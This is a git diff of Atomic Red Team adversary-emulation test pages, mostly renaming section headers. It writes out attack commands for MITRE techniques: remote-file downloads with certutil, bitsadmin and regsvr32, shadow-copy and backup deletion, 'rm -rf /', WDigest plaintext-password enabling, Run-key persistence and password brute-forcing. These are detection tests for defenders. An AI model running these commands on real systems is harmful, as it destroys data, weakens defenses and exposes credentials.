@@ -17,16 +17,20 @@ AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded i
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| registry_file | Windows Registry File | Path | T1103.reg|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
reg.exe import #{registry_file}
```
<br/>
atomics/T1105/T1105.md
+60 -20
View File
@@ -35,7 +35,7 @@ Utilize rsync to perform a remote file copy (push)
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| local_path | Path of folder to copy | Path | /tmp/adversary-rsync/|
@@ -43,13 +43,17 @@ Utilize rsync to perform a remote file copy (push)
| remote_host | Remote host to copy toward | String | victim-host|
| remote_path | Remote path to receive rsync | Path | /tmp/victim-files|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
```
<br/>
<br/>
@@ -59,7 +63,7 @@ Utilize rsync to perform a remote file copy (pull)
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | Path of folder to copy | Path | /tmp/adversary-rsync/|
@@ -67,13 +71,17 @@ Utilize rsync to perform a remote file copy (pull)
| remote_host | Remote host to copy from | String | adversary-host|
| local_path | Local path to receive rsync | Path | /tmp/victim-files|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
```
<br/>
<br/>
@@ -83,7 +91,7 @@ Utilize scp to perform a remote file copy (push)
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| local_file | Path of file to copy | Path | /tmp/adversary-scp|
@@ -91,13 +99,17 @@ Utilize scp to perform a remote file copy (push)
| remote_host | Remote host to copy toward | String | victim-host|
| remote_path | Remote path to receive scp | Path | /tmp/victim-files/|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
scp #{local_file} #{username}@#{remote_host}:#{remote_path}
```
<br/>
<br/>
@@ -107,7 +119,7 @@ Utilize scp to perform a remote file copy (pull)
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | Path of file to copy | Path | /tmp/adversary-scp|
@@ -115,13 +127,17 @@ Utilize scp to perform a remote file copy (pull)
| remote_host | Remote host to copy from | String | adversary-host|
| local_path | Local path to receive scp | Path | /tmp/victim-files/|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
scp #{username}@#{remote_host}:#{remote_file} #{local_path}
```
<br/>
<br/>
@@ -131,7 +147,7 @@ Utilize sftp to perform a remote file copy (push)
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| local_file | Path of file to copy | Path | /tmp/adversary-sftp|
@@ -139,13 +155,17 @@ Utilize sftp to perform a remote file copy (push)
| remote_host | Remote host to copy toward | String | victim-host|
| remote_path | Remote path to receive sftp | Path | /tmp/victim-files/|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
```
<br/>
<br/>
@@ -155,7 +175,7 @@ Utilize sftp to perform a remote file copy (pull)
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | Path of file to copy | Path | /tmp/adversary-sftp|
@@ -163,13 +183,17 @@ Utilize sftp to perform a remote file copy (pull)
| remote_host | Remote host to copy from | String | adversary-host|
| local_path | Local path to receive sftp | Path | /tmp/victim-files/|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
```
<br/>
<br/>
@@ -179,19 +203,23 @@ Use certutil -urlcache argument to download a file from the web. Note - /urlcach
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
```
<br/>
<br/>
@@ -201,13 +229,14 @@ Use certutil -verifyctl argument to download a file from the web. Note - /verify
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
New-Item -Path $datePath -ItemType Directory
@@ -218,6 +247,9 @@ Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-
<br/>
<br/>
@@ -228,20 +260,24 @@ This technique is used by Qbot malware to download payloads.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bits_job_name | Name of the created BITS job | String | qcxjb7|
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}
```
<br/>
<br/>
@@ -252,17 +288,21 @@ This technique is used by multiple adversaries and malware families.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{local_path}")
```
<br/>
atomics/T1107/T1107.md
+70 -18
View File
@@ -41,18 +41,22 @@ Delete a single file from the temporary directory
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_delete | Path of file to delete | Path | /tmp/victim-files/a|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
rm -f #{file_to_delete}
```
<br/>
<br/>
@@ -62,18 +66,22 @@ Recursively delete the temporary directory and all files contained within it
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| folder_to_delete | Path of folder to delete | Path | /tmp/victim-files|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
rm -rf #{folder_to_delete}
```
<br/>
<br/>
@@ -83,18 +91,22 @@ Use the `shred` command to overwrite the temporary file and then delete it
**Supported Platforms:** Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_shred | Path of file to shred | Path | /tmp/victim-shred.txt|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
shred -u #{file_to_shred}
```
<br/>
<br/>
@@ -104,7 +116,8 @@ Delete a single file from the temporary directory using cmd.exe
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
echo "T1107" > %temp%\T1107.txt
del /f %temp%\T1107.txt
@@ -112,6 +125,9 @@ del /f %temp%\T1107.txt
<br/>
<br/>
@@ -121,7 +137,8 @@ Recursively delete the temporary directory and all files contained within it usi
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
mkdir %temp%\T1107
rmdir /s /q %temp%\T1107
@@ -129,6 +146,9 @@ rmdir /s /q %temp%\T1107
<br/>
<br/>
@@ -138,7 +158,8 @@ Delete a single file from the temporary directory using Powershell
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
New-Item $env:TEMP\T1107.txt
Remove-Item -path $env:TEMP\T1107.txt
@@ -146,6 +167,9 @@ Remove-Item -path $env:TEMP\T1107.txt
<br/>
<br/>
@@ -155,12 +179,13 @@ Recursively delete the temporary directory and all files contained within it usi
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| folder_to_delete | Path of folder to delete | Path | C:\Windows\Temp\victim-files-ps|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
New-Item $env:TEMP\T1107 -ItemType Directory
Remove-Item -path $env:TEMP\T1107 -recurse
@@ -168,6 +193,9 @@ Remove-Item -path $env:TEMP\T1107 -recurse
<br/>
<br/>
@@ -177,13 +205,17 @@ Delete all volume shadow copies with vssadmin.exe
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
vssadmin.exe Delete Shadows /All /Quiet
```
<br/>
<br/>
@@ -193,13 +225,17 @@ Delete all volume shadow copies with wmic
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
wmic shadowcopy delete
```
<br/>
<br/>
@@ -209,7 +245,8 @@ This test leverages `bcdedit` to remove boot-time recovery measures.
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
@@ -217,6 +254,9 @@ bcdedit /set {default} recoveryenabled no
<br/>
<br/>
@@ -226,29 +266,37 @@ This test deletes Windows Backup catalogs.
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
wbadmin delete catalog -quiet
```
<br/>
<br/>
## Atomic Test #12 - Delete Filesystem - Linux
This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
**Supported Platforms:** Linux, CentOS, Ubuntu
**Supported Platforms:** Linux
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
rm -rf / --no-preserve-root > /dev/null 2> /dev/null
```
<br/>
<br/>
@@ -258,11 +306,15 @@ Delete a single prefetch file. Deletion of prefetch files is a known anti-foren
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])
```
<br/>
atomics/T1107/T1107.yaml
+1 -2
View File
@@ -153,8 +153,7 @@ atomic_tests:
This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
supported_platforms:
- linux
- centos
- ubuntu
executor:
name: bash
command: |
atomics/T1110/T1110.md
+6 -2
View File
@@ -41,7 +41,7 @@ Creates username and password files then attempts to brute force on remote host
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file_users | Path to a file containing a list of users that we will attempt to brute force | Path | DomainUsers.txt|
@@ -49,7 +49,8 @@ Creates username and password files then attempts to brute force on remote host
| remote_host | Hostname of the target system we will brute force upon | String | \\COMPANYDC1\IPC$|
| domain | Domain name of the target system we will brute force upon | String | YOUR_COMPANY|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
net user /domain > #{input_file_users}
echo "Password1" >> #{input_file_passwords}
@@ -60,4 +61,7 @@ echo "Password!" >> #{input_file_passwords}
<br/>
atomics/T1112/T1112.md
+30 -10
View File
@@ -29,17 +29,21 @@ Modify the registry of the currently logged in user using reg.exe cia cmd consol
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
```
#### Cleanup Commands:
```
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f
```
<br/>
<br/>
@@ -50,17 +54,21 @@ CMD is ran as Administrative rights.
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
```
#### Cleanup Commands:
```
reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f
```
<br/>
<br/>
@@ -70,7 +78,8 @@ Modify a registry key of each user profile not currently loaded on the machine u
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
# here is an example of using the same method of reg load, but without the New-PSDrive cmdlet.
# Here we can load all unloaded user hives and do whatever we want in the location below (comments)
@@ -128,6 +137,9 @@ reg unload "HKU\$($ProfileList[$p].SID)"
<br/>
<br/>
@@ -137,17 +149,21 @@ Sets registry key that will tell windows to store plaintext passwords (making th
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
```
<br/>
<br/>
@@ -157,14 +173,15 @@ Sets Windows Registry key containing base64-encoded PowerShell code.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|
| registry_key_storage | Windows Registry Key to store code | String | HKCU:Software\Microsoft\Windows\CurrentVersion|
| registry_entry_storage | Windows Registry entry to store code under key | String | Debug|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
@@ -173,10 +190,13 @@ $EncodedCommand
Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
```
#### Cleanup Commands:
```
Remove-ItemProperty -Force -Path -Path #{registry_key_storage} -Name #{registry_entry_storage}
```
<br/>
atomics/T1113/T1113.md
+24 -8
View File
@@ -29,18 +29,22 @@ Use screencapture command to collect a full desktop screenshot
**Supported Platforms:** macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file path | Path | desktop.png|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
screencapture
```
<br/>
<br/>
@@ -50,18 +54,22 @@ Use screencapture command to collect a full desktop screenshot
**Supported Platforms:** macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file path | Path | desktop.png|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
screencapture -x
```
<br/>
<br/>
@@ -71,12 +79,13 @@ Use xwd command to collect a full desktop screenshot and review file with xwud
**Supported Platforms:** Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file path | Path | desktop.xwd|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
xwd -root -out #{output_file}
xwud -in #{output_file}
@@ -84,6 +93,9 @@ xwud -in #{output_file}
<br/>
<br/>
@@ -93,16 +105,20 @@ Use import command to collect a full desktop screenshot
**Supported Platforms:** Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file path | Path | desktop.png|
#### Run it with `bash`!
#### Attack Commands: Run with `bash`!
```
import -window root
```
<br/>
atomics/T1114/T1114.md
+7 -3
View File
@@ -25,20 +25,24 @@ Search through local Outlook installation, extract mail, compress the contents,
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file path | String | $home\desktop\mail.csv|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
powershell -executionpolicy bypass -command $PathToAtomicsFolder\T1114\Get-Inbox.ps1 -file #{output_file}
```
#### Cleanup Commands:
```
del #{output_file}
```
<br/>
atomics/T1115/T1115.md
+11 -3
View File
@@ -25,19 +25,23 @@ Add data to clipboard to copy off or execute commands from.
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
dir | clip
echo "T1115" > %temp%\T1115.txt
clip < %temp%\T1115.txt
```
#### Cleanup Commands:
```
del %temp%\T1115.txt
```
<br/>
<br/>
@@ -47,7 +51,8 @@ Utilize PowerShell to echo a command to clipboard and execute it
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
echo Get-Process | clip
iex Get-Clipboard
@@ -55,4 +60,7 @@ iex Get-Clipboard
<br/>
atomics/T1117/T1117.md
+18 -6
View File
@@ -25,18 +25,22 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| filename | Name of the local file, include path. | Path | PathToAtomicsFolder\T1117\RegSvr32.sct|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
regsvr32.exe /s /u /i:#{filename} scrobj.dll
```
<br/>
<br/>
@@ -46,18 +50,22 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | URL to hosted sct file | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
regsvr32.exe /s /u /i:#{url} scrobj.dll
```
<br/>
<br/>
@@ -67,16 +75,20 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_name | Name of DLL to Execute, DLL Should export DllRegisterServer | Path | PathToAtomicsFolder\T1117\bin\AllTheThingsx86.dll|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
"IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
```
<br/>
atomics/T1118/T1118.md
+12 -4
View File
@@ -19,13 +19,14 @@ Executes the Uninstall Method
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| filename | location of the payload | Path | PathToAtomicsFolder\T1118\src\T1118.dll|
| source | location of the source code to compile | Path | PathToAtomicsFolder\T1118\src\T1118.cs|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:#{filename} #{source}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U #{filename}
@@ -33,6 +34,9 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToCo
<br/>
<br/>
@@ -42,13 +46,14 @@ Executes the Uninstall Method
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| filename | location of the payload | Path | PathToAtomicsFolder\T1118\src\T1118.dll|
| source | location of the source code to compile | Path | PathToAtomicsFolder\T1118\src\T1118.cs|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:#{filename} #{source}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /? #{filename}
@@ -56,4 +61,7 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /? #{filename}
<br/>
atomics/T1119/T1119.md
+22 -6
View File
@@ -23,7 +23,8 @@ Automated Collection
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
dir c: /b /s .docx | findstr /e .docx
for /R c: %f in (*.docx) do copy %f c:\temp\
@@ -31,6 +32,9 @@ for /R c: %f in (*.docx) do copy %f c:\temp\
<br/>
<br/>
@@ -40,13 +44,17 @@ Automated Collection
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:\temp}
```
<br/>
<br/>
@@ -56,14 +64,14 @@ collect information for exfiltration
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Get-Service > $env:TEMP\T1119_1.txt
Get-ChildItem Env: > $env:TEMP\T1119_2.txt
Get-Process > $env:TEMP\T1119_3.txt
```
#### Cleanup Commands:
```
Remove-Item $env:TEMP\T1119_1.txt
@@ -71,6 +79,10 @@ Remove-Item $env:TEMP\T1119_2.txt
Remove-Item $env:TEMP\T1119_3.txt
```
<br/>
<br/>
@@ -80,7 +92,8 @@ collect information for exfiltration
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
sc query type=service > %TEMP%\T1119_1.txt
doskey /history > %TEMP%\T1119_2.txt
@@ -88,7 +101,6 @@ wmic process list > %TEMP%\T1119_3.txt
tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt
```
#### Cleanup Commands:
```
del %TEMP%\T1119_1.txt
@@ -97,4 +109,8 @@ del %TEMP%\T1119_3.txt
del %TEMP%\T1119_4.txt
```
<br/>
atomics/T1121/T1121.md
+14 -6
View File
@@ -19,24 +19,28 @@ Executes the Uninstall Method, No Admin Rights Required
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | Location of the payload | Path | T1121.dll|
| source_file | Location of the CSharp source_file | Path | PathToAtomicsFolder\T1121\src\T1121.cs|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name}
```
#### Cleanup Commands:
```
del #{file_name}
```
<br/>
<br/>
@@ -46,13 +50,14 @@ Executes the Uninstall Method, No Admin Rights Required, Requires SNK
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | Location of the payload | Path | T1121.dll|
| source_file | Location of the CSharp source_file | Path | PathToAtomicsFolder\T1121\src\T1121.cs|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
@@ -61,11 +66,14 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServic
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{file_name}
```
#### Cleanup Commands:
```
del #{file_name}
del key.snk
```
<br/>

Some files were not shown because too many files have changed in this diff Show More